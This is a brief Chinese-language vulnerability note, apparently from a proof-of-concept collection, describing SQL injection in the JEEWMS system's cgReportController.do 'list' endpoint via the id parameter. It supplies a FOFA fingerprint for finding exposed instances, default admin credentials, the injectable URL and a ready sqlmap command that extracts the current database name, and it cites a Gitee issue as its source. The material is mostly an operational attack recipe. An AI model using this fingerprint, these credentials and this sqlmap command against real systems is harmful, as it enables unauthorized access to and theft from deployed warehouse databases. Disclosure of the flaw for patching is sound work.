JEEWMS系统cgReportController.do存在SQL注入漏洞.md

JEEWMS系统cgReportController.do存在SQL注入漏洞

JEEWMS系统cgReportController.do存在SQL注入漏洞

fofa

body="plug-in/lhgDialog/lhgdialog.min.js?skin=metro"

poc

1. 构建 POC，登录后端捕获数据包，并替换 cookie

admin/llg123
http://localhost:8083/jeewms/cgReportController.do?list&id=1

1. 使用 SQLMAP 重现和构造执行语句

 python sqlmap.py -u "http://localhost:8083/jeewms/cgReportController.do?list&id=1" --cookie="XXXXX" -p id --current-db

漏洞来源

• JEEWMS-cgReportController.do？List&ID 存在 SQL 注入漏洞 ·问题 #IBFTVK ·JeeWMS/JeeWMS - Gitee.com